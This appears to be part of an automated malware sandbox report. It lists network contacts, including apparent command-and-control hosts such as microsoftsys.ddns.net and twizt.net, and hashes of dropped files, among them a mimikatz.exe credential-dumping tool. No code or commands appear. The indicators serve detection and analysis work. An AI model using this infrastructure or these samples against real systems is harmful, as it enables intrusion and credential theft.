| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 90.156.162.72:40500 | udp | |
| US | 20.83.148.22:80 | tcp | |
| RU | 176.214.150.127:40500 | udp | |
| UZ | 87.237.234.195:40500 | tcp | |
| IR | 5.202.242.190:40500 | udp | |
| US | 8.8.8.8:53 | 190.242.202.5.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| KZ | 2.135.217.22:40500 | udp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| DE | 37.1.196.35:80 | tcp | |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 20.83.148.22:80 | tcp | |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| AO | 154.71.224.9:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 5.235.185.18:40500 | tcp | |
| KZ | 31.171.187.236:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| KZ | 95.57.180.169:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 84.54.71.94:40500 | udp | |
| RU | 78.37.229.249:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 213.230.124.7:40500 | udp | |
| YE | 46.35.80.190:40500 | udp | |
| US | 8.8.8.8:53 | 190.80.35.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| UZ | 90.156.160.10:40500 | udp | |
| IR | 2.176.109.189:40500 | udp | |
| UZ | 89.236.219.80:40500 | tcp | |
| US | 20.83.148.22:80 | tcp | |
| IR | 46.248.37.226:40500 | udp | |
| US | 8.8.8.8:53 | 226.37.248.46.in-addr.arpa | udp |
| KZ | 178.91.91.13:40500 | udp | |
| GB | 2.101.182.195:40500 | udp | |
| US | 8.8.8.8:53 | 195.182.101.2.in-addr.arpa | udp |
| DE | 37.1.196.35:80 | tcp | |
| UA | 212.22.213.217:40500 | udp | |
| PK | 39.42.48.119:40500 | tcp | |
| MX | 189.142.102.173:40500 | udp | |
| US | 8.8.8.8:53 | 173.102.142.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| KR | 123.214.186.171:40500 | udp | |
| IR | 80.191.218.209:40500 | udp | |
| KZ | 109.239.42.219:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 2.181.218.27:40500 | tcp | |
| YE | 134.35.205.29:40500 | udp | |
| RU | 95.189.161.127:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.190.224.152:40500 | udp | |
| MX | 189.135.139.214:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
Files
C:\Users\Admin\Desktop\4363463463464363463463463.exe
| MD5 | 2a94f3960c58c6e70826495f76d00b85 |
| SHA1 | e2a1a5641295f5ebf01a37ac1c170ac0814bb71a |
| SHA256 | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce |
| SHA512 | fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f |
memory/5012-4-0x000000007524E000-0x000000007524F000-memory.dmp
memory/5012-5-0x00000000003A0000-0x00000000003A8000-memory.dmp
memory/5012-6-0x0000000004DF0000-0x0000000004E8C000-memory.dmp
memory/5012-7-0x0000000075240000-0x00000000759F1000-memory.dmp
C:\Users\Admin\Desktop\Files\ewrvuh.exe
| MD5 | bda1e244f73c16499b8faa763e79cc52 |
| SHA1 | f6b599b144c1a792681624cbbaf277352f175d55 |
| SHA256 | c1de42382bc44f0871f0fe67c18d669a57291deace62b9c27f7ad76872231886 |
| SHA512 | e8291e34976516e9a04eddfd82fbfd5eac1cbb8887b83e6cfb5c764992079d4139f9ef6aa3ae8fd3716aa6e221d1aa352f1472c7579636b5634071940066fd10 |
C:\Users\Admin\Desktop\Files\PURLOG.exe
| MD5 | 457c9342db5fc82febdcf8a348123a0e |
| SHA1 | e887c2a3159d59528550c775f9779c960e561f0d |
| SHA256 | c4343749a452155318b249b122c8482e953994e31627cbc82a3c3e52c21ef902 |
| SHA512 | 128c63e21e9998db3bc39411a5a0a83bca49fe2c86e45fd17a99d8d2f2cd84b926599b2472d7533931e021bbf3d44d0581e0b091870eb2c0dd895098bd229b6a |
memory/4444-27-0x000002CE8C820000-0x000002CE8C9EA000-memory.dmp
memory/4444-28-0x000002CEA7080000-0x000002CEA7230000-memory.dmp
memory/4444-37-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-48-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
C:\Users\Admin\Desktop\Files\m.exe
| MD5 | 0c883b1d66afce606d9830f48d69d74b |
| SHA1 | fe431fe73a4749722496f19b3b3ca0b629b50131 |
| SHA256 | d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1 |
| SHA512 | c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5 |
memory/4444-46-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-42-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-40-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-38-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-35-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-50-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-32-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-44-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-30-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-29-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-68-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-72-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-96-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-102-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-100-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-99-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-94-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-92-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-90-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-88-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-84-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-82-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-80-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-78-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-74-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-70-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-66-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
C:\Users\Admin\Desktop\Files\test16.exe
| MD5 | 9f88e470f85b5916800c763a876b53f2 |
| SHA1 | 4559253e6df6a68a29eedd91751ce288e846ebc8 |
| SHA256 | 0961766103f8747172f795b6cbf3c8ef06a1ded91fe49ff0f2f280cc326d1d9a |
| SHA512 | c4fc712ed346c3c40f33f2514f556e92d915a6d0257fdd8d174b3f87f8c34a9167cfaca58785b52b68a5e5c710656a6269e5d0e20eef7f63a6d06f658d53fb5d |
memory/4444-64-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-87-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-60-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-76-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/4444-62-0x000002CEA7080000-0x000002CEA722A000-memory.dmp
memory/5012-1123-0x000000007524E000-0x000000007524F000-memory.dmp
memory/4444-1124-0x000002CEA7330000-0x000002CEA745A000-memory.dmp
memory/4444-1125-0x000002CE8E6D0000-0x000002CE8E71C000-memory.dmp
memory/5012-1129-0x0000000075240000-0x00000000759F1000-memory.dmp
C:\Users\Admin\Desktop\Files\up.exe
| MD5 | f3d2b3aa8ea4df12b56486c60e146adc |
| SHA1 | 05d6e48bed2829c60575b4b3af010c88296c45ef |
| SHA256 | 9ba3f1cfdc0f97fad2bbbb59e197e9d0556b70501654f542b47ff05978b5b12d |
| SHA512 | 0674d8f646242a34bdcc71c239c0c9e94904138c199e1d9390819f60a80765ec2c836989f6bdbeaa22fb1bf04c850d26703be3248d4abaf0b294cd13322de031 |
memory/2776-1138-0x0000000031720000-0x00000000324CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1809827666.exe
| MD5 | cb8420e681f68db1bad5ed24e7b22114 |
| SHA1 | 416fc65d538d3622f5ca71c667a11df88a927c31 |
| SHA256 | 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea |
| SHA512 | baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf |
memory/3116-1147-0x0000000000E00000-0x0000000000E06000-memory.dmp
memory/2776-1155-0x0000000031720000-0x00000000324CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2420715866.exe
| MD5 | 96509ab828867d81c1693b614b22f41d |
| SHA1 | c5f82005dbda43cedd86708cc5fc3635a781a67e |
| SHA256 | a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744 |
| SHA512 | ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca |
C:\Users\Admin\AppData\Local\Temp\1622938899.exe
| MD5 | 13b26b2c7048a92d6a843c1302618fad |
| SHA1 | 89c2dfc01ac12ef2704c7669844ec69f1700c1ca |
| SHA256 | 1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256 |
| SHA512 | d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455 |
C:\Users\Admin\AppData\Local\Temp\164314122.exe
| MD5 | 66ca91a3e8d4f9714b4bafacdae69acb |
| SHA1 | e4582bbc4c220a5cdd8e7d18622c4bd5614d1bfa |
| SHA256 | 1377b8f0963af037caa6afda723945d55971b2fefaee6eb5993bbbcb91bc3f8d |
| SHA512 | a2df2f2dd67b034606892257bf05ba0517f7d24b21f2c9561b08cae17e2e9a52216f8bf79ca6ecae7f0b6675310c3c5ac5764b1cc0031404f09203b01662d0ef |
memory/4444-1171-0x000002CE8E720000-0x000002CE8E774000-memory.dmp
memory/3736-1175-0x000001BAE8480000-0x000001BAE858E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkpjh5rn.5so.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3004-2006-0x0000022376820000-0x0000022376842000-memory.dmp
memory/3736-4040-0x000001BACFD10000-0x000001BACFDAE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2603430756.exe
| MD5 | b92ad7e3c510355dd54db74cdf4d522e |
| SHA1 | bf4e93257363aa26d02a2cafd1805566923b7ef4 |
| SHA256 | 42a3d89601affbf702b44e56746f2ff19308848e49ba0fae86202345ab19c95f |
| SHA512 | 1462ebf284a4d20900aec239449693e5d5c73cfd1283d8a4aedc293f82b0b7ee3bc66aa3fdd916377c2e00f64212ce71e455fddd3b960c9de1c88b3886ddc388 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e35ccc1fb2737f09352fdbd01a85ae3a |
| SHA1 | 035035ad9bbca97cb8273eb364ce73f6bc749dd1 |
| SHA256 | 498dfcd7d9c850b922f1db5d4d2cee185839c611db03931b09313070dc628053 |
| SHA512 | 2300d0f005fd1d5dfc5957877d15cda7215dda18ff6a4276bc3d6f405aa4769b71320a51cea88f9efd44bc2c8aeea5d5fc3a20509db2797cf47b6ecac4b9b5b3 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 4764ec833397133003e2e24b080cd7ce |
| SHA1 | 03c8926d7afc4e605719aee53ef2ce53f6f314cc |
| SHA256 | 88331ffd23c1d6cfef379ab5366333f56ee41ff083f0421915302a492cb2a833 |
| SHA512 | e9ad86bc3878f4f3e1a38a191864857f24969e0f11d0636cb76523900e97b06d286c120460c38e7f93039356f45900d32ddda990abffb1958af173dfb1aedac1 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PURLOG.exe.log
| MD5 | 8d2a339197d37b8c742c0d76a94aff38 |
| SHA1 | 8e014816925548186e001deff52ff28778deb063 |
| SHA256 | 90ac5a646c5389ce54e23295504b6ba945ab6688d17fa3a85e4f2cca8d34fd19 |
| SHA512 | bf1d05f3a113073660ce66b9a6b1aeca43b9eddb67479c75a914b954df5e27e129b61caa7a5a0926bbd0a9e02ea74a81ec61f121f479ad7ef2c35cb0175276db |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\1809827666.exe.log
| MD5 | de75c43a265d0848584ae05945570edf |
| SHA1 | 69f95177914f8d8b2f278a91f585a0024b8dffd3 |
| SHA256 | d9bdf6a2bfdd9b2b5c8593de17ade3d8d317dad331aa6ca0da7483dd06db1140 |
| SHA512 | 365f29c693dd7aa2ade092d765a96f20bf1f7fa93bca7f3b25aeddf5700817b9fd388e8f7d9f1b781c8a876739b06ad16d61e7ed08a1c85ac4be4686a38c63bc |
C:\Users\Admin\AppData\Local\Temp\1888623094.exe
| MD5 | 83a784716728ca579619d0e13a9f17b0 |
| SHA1 | 5e33ca9dab3c0df2edcd597b8b0da06c88f18f6b |
| SHA256 | 9dc0b007f33f768fff2249388428981d89cfcee3e5babd206bbaeb7d5cc34b4f |
| SHA512 | f8218a8e977f0ec340e7139041cfff8bac4cc23bcea0c0c0d7717ead76093d45d10acd72a5846486e9348ce642f529824f1575d0d28b8d2f566c543c7c9d3bc4 |
C:\Users\Admin\AppData\Local\Temp\1431716774.exe
| MD5 | 2473392c0a773aad20da1519aa6f464b |
| SHA1 | 2068ffd843bb8c7c7749193f6d1c5f0a9b97b280 |
| SHA256 | 3d33e8778ea8194d486d42784411e8528c602594abdf3e32cdcee521a10f3ce7 |
| SHA512 | 5455866f5fc53ae48ff24222b40a264bf673102435abeac2a61ba6fcaa1de429d8f078d4d065cb5d77b96de87f343579651b718e0a60934fb9fa35818d948074 |
C:\Users\Admin\Desktop\Files\pei.exe
| MD5 | 08dafe3bb2654c06ead4bb33fb793df8 |
| SHA1 | d1d93023f1085eed136c6d225d998abf2d5a5bf0 |
| SHA256 | fc16c0bf09002c93723b8ab13595db5845a50a1b6a133237ac2d148b0bb41700 |
| SHA512 | 9cf2bd749a9ee6e093979bc0d3aacfba03ad6469c98ff3ef35ce5d1635a052e4068ac50431626f6ba8649361802f7fb2ffffb2b325e2795c54b7014180559c99 |
C:\Users\Admin\Desktop\Files\PctOccurred.exe
| MD5 | 31f04226973fdade2e7232918f11e5da |
| SHA1 | ff19422e7095cb81c10f6e067d483429e25937df |
| SHA256 | 007c6dfe4466894d678c06e6b30df77225450225ddd8e904e731cab32e82c512 |
| SHA512 | 42198fc375993a09da3c8a2766ee6831cf52ff8cd60b3eb4256a361afa6963f64a0aff49adb87c3b22950e03c8ef58a94655959771f8d2d5b754012706220f66 |
C:\Users\Admin\AppData\Local\Temp\Powell
| MD5 | 4ae2c64145fe81c75f62a1ac65904a58 |
| SHA1 | fd70229a1fcd534498c7179ca3a02abb6523a277 |
| SHA256 | 315e74622a85b4dce78188b734154a595ff1a1a8cb191b2d92a95be1c0bdbc37 |
| SHA512 | bf81502fe99ba78b414577df49c86c98c8154f409c41ee536dcf29fe979a859e40561b3d97245ee76d9ccfc908f9a623372c77ec05b8a8e665777aae01a475a0 |
C:\Users\Admin\Desktop\Files\built.exe
| MD5 | a813f565b05ee9df7e5db8dbbcc0fa43 |
| SHA1 | f508e738705163233b29ba54f4cb5ec4583d8df1 |
| SHA256 | ba59fb813ff718db8a17c4e5d244793d2199383969843ad31d09727b5e5ff156 |
| SHA512 | adb431c372c2e1d0f6019bedefe16a2253fcf76929ba7e2b9f9cc7a253137920615121a1a64f7003a43f39e8b17ace233daca32b2933b6953aa6cf558b834e2e |
memory/1420-4149-0x0000000000230000-0x0000000000554000-memory.dmp
memory/2860-4161-0x000000001B090000-0x000000001B0E0000-memory.dmp
memory/2860-4162-0x000000001BA30000-0x000000001BAE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\AFtqGY9CJmsw.bat
| MD5 | 1db755f7e85b11ffa35cb6360da414af |
| SHA1 | c738409f843505077b970a590f6897238af814f2 |
| SHA256 | 8b76a01bd64e6b940f4e6425ead4525da571d6572c725754b4cadfe9cf6ae1fc |
| SHA512 | 99677c17aeaad52226038073e39c53dad20ced817526b98de3c722f702371404fb45fdf97887c7164948915e2cdb13cd2655d0a37a39fbf49fe278e1c62ed570 |
C:\Users\Admin\AppData\Local\Temp\Hist
| MD5 | 01f1ebfab9f7716fd124ef8edd32a90f |
| SHA1 | 85a045dab05d4c1360f97f3e3d32679e844766c8 |
| SHA256 | 379fdc3da78974a0332ec7b4c0704d500869ab83afadeba852cd2b510aec4f80 |
| SHA512 | 3f1300fc81667a73026fe79f4984278e65d87ba1d2ccb1833c50319f5cf5d44a6865bd9ad8cd12586e0500f99c670174b8e544e440d7d5e3be27acf2e068e8b1 |
C:\Users\Admin\AppData\Local\Temp\Stewart
| MD5 | 121c1acb3a03bd31c6ae1e13db4469c8 |
| SHA1 | e1d7be7f98ad139a0a0db4ef4014af420915ff2e |
| SHA256 | 1ecdd3d64dc38399a17c68412ecba9b9c1a31b9911605f22a362b4f0a1c7f21d |
| SHA512 | 898740bb7499b5d889c6b81b780cf76ace4ded1c50e26c6b9149fc9143724789328a937d0d6496e5838af5964813ff4d9edb0f8f696d8054ff5e03613f351583 |
C:\Users\Admin\AppData\Local\Temp\Medicines
| MD5 | 394e00f0b18a19021b82919b0953a251 |
| SHA1 | 3dfd4dbf28f4aa4c08c74b70662c01c950bf3ad9 |
| SHA256 | 9d32778c46127d2af6991663c47dac68ac3424181063b44e82e3b82af73369a1 |
| SHA512 | b5e6c76075e19bdcbcd0ae4ccf9acb37154d84dbe1a17b9c2e40ce9e4d5b194774d608d812ae54f8f6331e255d3f1820a526eb8ad80b174babe6a39a2002f5f5 |
C:\Users\Admin\AppData\Local\Temp\Statistical
| MD5 | 5822d1bc4305d9f19939768fdfbf4d31 |
| SHA1 | 30949a77d5c66825c5255566a2c074142d114f04 |
| SHA256 | 15ae29d30cebd36f8b499edd660444cb16e880ec5469e14c608f76a59f15faa7 |
| SHA512 | b474b021d0e8b405ea64bda4afef1c191834236c759a5e52fb8813fdfca14536942c9600624cfd1d675fd9e119579795c86dddabbf909eea21a585236b2489c7 |
C:\Users\Admin\AppData\Local\Temp\Ak
| MD5 | 2078e604090ab3f34e7254584f5b5e18 |
| SHA1 | 6c6923837538fe0516a7395fd114c6000da29fdb |
| SHA256 | 9b129a2e4cef84ec4f1101524cdec497f7daeed3fda8cac227803772ebb80ca7 |
| SHA512 | af16f5679fc77dfd32c2bc2bfcaf80f56d633a3cb47941565f35ca84c5b385eeebd4caf8a703860a2e3b1a55a808a576a85ed0c5a6595ffa7d2fb0435dbee08f |
C:\Users\Admin\AppData\Local\Temp\Remained
| MD5 | 7eb0c07b15f6891636b5b18e6c8782eb |
| SHA1 | 41f132b6db4d2b5253e91d84e927995a00e96976 |
| SHA256 | a378de033ee73a1881a1d65e6a49686d087614d46286360698b639b62c097e84 |
| SHA512 | 688e2327e9afb9561fb7b4e932efdd22ce56e0efdfcba80eb058cbabb6595c93216590290281a3ae34b45f623d2dd1325edfd5375f3caac129ae2d7b4777f754 |
C:\Users\Admin\AppData\Local\Temp\While
| MD5 | 8d0730549c077df4608642def3a3797b |
| SHA1 | 70ff0d8c5a80918766cee21a944ffcf1a589c35a |
| SHA256 | 34c4628b7b7f34ba02bf64d730eb7e957f943dc404f2f36a543b8d406b78775c |
| SHA512 | ddb2ebebc032ace041df5ff83e2a4b68086ec4f89bd8a30f36cfe6fb7909ac895c00730c47a267bf5ba31ecf5863e4108c869a9d18dab538f4c18a5ee3a3d20f |
C:\Users\Admin\AppData\Local\Temp\Bs
| MD5 | 5383c87dff2feb9b2c8e93c4bed93e34 |
| SHA1 | 1487faf6f6e098fd878f4536bb99cf8c628b12a4 |
| SHA256 | 963b21a66a6afd24e3c8eab4e9d3fa803caca58f2f1e2cbd2e80451ab2b5bb73 |
| SHA512 | af6219b70b180518f7a5866e95719e23a28394b814239f38250383511b7da1d3712dbd49be75e375f66226192dfc2d46dd905f0733e6bfffe13eeac3ef9f975d |
C:\Users\Admin\AppData\Local\Temp\Keyboards
| MD5 | 648848687fe144ab2925ff056f85e839 |
| SHA1 | ad8601e28076e553bdce4b49e5585d193ce9f26f |
| SHA256 | 68340ba1f2afcb31904ad77653b22b19601a86d2031b39ce320611fc26a30462 |
| SHA512 | ff5b5d86710242944a6c5a6ba6ec29e57e561ce156022243f0d6028a8ec2eba0d6f13dcb2ab007a5c38c5f69fb8bb5816ddcead72588626a6626bb1336f77b27 |
C:\Users\Admin\AppData\Local\Temp\Scott
| MD5 | 7e600368be6cc5c03b1bf613a36885d1 |
| SHA1 | c0cc74598ef38940fc48ccb01fa27e9b27e80e62 |
| SHA256 | 0b4bfde6485d29cba34de2cd28191b5fc21dfcd3aca109f68599e19a609cbe44 |
| SHA512 | b6b66babcadd81d4e4e5b62e778ea79acc2a48b9c0ab9bf81a7ec61f9f9ccf394bc16982b80f07b113645a24f209d68cddc733266d0f0e3d722567f120d425cc |
C:\Users\Admin\AppData\Local\Temp\Autumn
| MD5 | 452ec03a6dc9758ff5c0d17f9e55572a |
| SHA1 | 194df13d1dd92f3c986bb1b196eebf6e25900412 |
| SHA256 | bd9b030da3887b0cb821ef37aab7771d7d048c05835c3eb5ee034cd077a85cd3 |
| SHA512 | f2d6979ac9915991020522d4c7218e431a437d9b06b40c395923fdacc514056f01ca127f4264697f0e49faf88b15df8eb6cca80f69e0983f4af7dcda51a87f6c |
C:\Users\Admin\AppData\Local\Temp\Entity
| MD5 | 116177ea561e297830d84e68e4851a28 |
| SHA1 | 80545b33450655d3e5e7c055aace79a31eadd3af |
| SHA256 | 3570fa88359a94df74450f1be19f8fb54e566270f968254ac56b616a424b8446 |
| SHA512 | 86e8f3dc6a9b18f4e5a9f2cb1f58baabe782ca264105967987e0eae987f00eeece800ee4f3c126b95ea471c5fd6530d11a87bb9be5a7a2c66ea473b84be6f839 |
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
| MD5 | c56b5f0201a3b3de53e561fe76912bfd |
| SHA1 | 2a4062e10a5de813f5688221dbeb3f3ff33eb417 |
| SHA256 | 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d |
| SHA512 | 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c |
C:\Users\Admin\AppData\Local\Temp\193997\y
| MD5 | d6a0473754ad77650d88eaa94cf4bcf0 |
| SHA1 | d2123bf8b796fe6f76e570641037d9420b3f3c78 |
| SHA256 | 355d2dc53492ea6ba26263dd8a2f7544ae3a36c17f64cccb6ad84007bebafbb7 |
| SHA512 | 14d844255fb657a039d4f94ddcc58acc79d44fdc58882ace49a453c537db86ceeef9a10640d83ff20af2caa0e880de3e77b7afbf2af79291873c0f81db72d3bc |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PerfWatson1.exe.log
| MD5 | 15eab799098760706ed95d314e75449d |
| SHA1 | 273fb07e40148d5c267ca53f958c5075d24c4444 |
| SHA256 | 45030bd997f50bb52c481f7bc86fac5f375d08911bcc106b98d9d8f0c2ce9778 |
| SHA512 | 50c125e2a98740db0a0122d7f4de97c50d84623e800b3d3e173049c8e28ff0fbe4add7677bc56cb2228f78ed17522f67ae8f1b85f62824012414ce38ce0b500c |
C:\Users\Admin\Desktop\Files\build11.exe
| MD5 | 2cb47309bb7dde63256835d5c872b2f9 |
| SHA1 | 8baa9effc09cf80b4a1bac1aa2aa92b38c812f1d |
| SHA256 | 18687a2ceebf3eda4a11a2ef0b1d85360d8837ad05c1b57f9f749ea06578848e |
| SHA512 | 3db4a42cbf6bc26d77320bf747e7244e54320b5e6ebf6a65bfd731beb7e99958bc5b7e9fe3ab1579becd42c588789c2185be74f143d120041b0331b316017104 |
C:\Users\Admin\Desktop\Files\win.exe
| MD5 | 73e0321f95791e8e56b6ae34dd83a198 |
| SHA1 | b1e794bb80680aa020f9d4769962c7b6b18cf22b |
| SHA256 | cae686852a33b1f53cdb4a8e69323a1da42b5b8ac3dd119780959a981305466b |
| SHA512 | cc7b0ddf8fdb779c64b4f9f8886be203efb639c5cad12e66434e98f7f8ac675aee1c893014d8c2a36761504b8b20b038a71413934b8bc8229fdde4f13c8d47bc |
C:\Users\Admin\AppData\Local\Temp\1716412561.exe
| MD5 | 2266f0aecd351e1b4092e82b941211ea |
| SHA1 | 1dced8d943494aa2be39ca28c876f8f736c76ef1 |
| SHA256 | cbbad0ab02cd973c9c4e73336e3bcd0849aeb2232a7bdbc38f0b50696b5c28c3 |
| SHA512 | 6691cd697bbe7f7a03d9de33869aab289d0a1438b4ee194d2047ded957a726b1d3fe93f08e4a0c677018b20e2521aeb021ab1dc4d1a67927604829ddfd9d59aa |
C:\Users\Admin\Desktop\Files\mimikatz.exe
| MD5 | d3b17ddf0b98fd2441ed46b033043456 |
| SHA1 | 93ed68c7e5096d936115854954135d110648e739 |
| SHA256 | 94795fd89366e01bd6ce6471ff27c3782e2e16377a848426cf0b2e6baee9449b |
| SHA512 | cac2230361981323ea998c08f7d9afc9369c62a683a60421628adab1eb1e4ffbbc9c2239a8bf66cb662ad7d56e7284f9051bb548979b8c6862570ce45aa27120 |
C:\Users\Admin\Desktop\Files\pyl64.exe
| MD5 | d07b3c00866cb1bba2cf2007161f84af |
| SHA1 | f0215fdb9c97bd752489dd1601a4253494beafcb |
| SHA256 | d2662051702168049d751c1b90cfef9f1e34a04a6c7689db3c79a2547a7339ba |
| SHA512 | 1d98b1d01e897caf715f877672cf256a25a3c3318af898df046cc011830376f558a65c0f5e308d0922f66634f24cced3999a7bb6cbffa9d8cd3091f27436f76f |
C:\Users\Admin\Desktop\Files\02.08.2022.exe
| MD5 | 589ddae338c2a7df328d6630f513475e |
| SHA1 | e96c1f60875f6f315b09dae37ab1e8cf8add3993 |
| SHA256 | 269519b5a1fb395ca164330671f78528efca1ac12ba08ab6e2d833bbe968ced9 |
| SHA512 | 9fd4d418ac78a88323d68d95277fa391e4167ee99d8bd2a1f95aaa4c12594ce05f305e247f09d1284eefbfeb739ed7ef17c65014932660723f18e0c0e01c98be |
C:\Users\Admin\tbtnds.dat
| MD5 | 3d63858dea8b408bfef78924872819f7 |
| SHA1 | 7647994c8f5704ba0c2ea886b31041a96a9226fb |
| SHA256 | 55d2d0216a308825cadc5a9dd8caf2d6512b5b990ba69f6c7c9e8812190a3894 |
| SHA512 | df32dd8d969cee3e4e2241fff620e3266da43ce7abbf93da56a20f30cd5efe3e9f2d1fe190fd7eab46e587a7861350deb1aaddca50d51d1b9894fd830dd251f9 |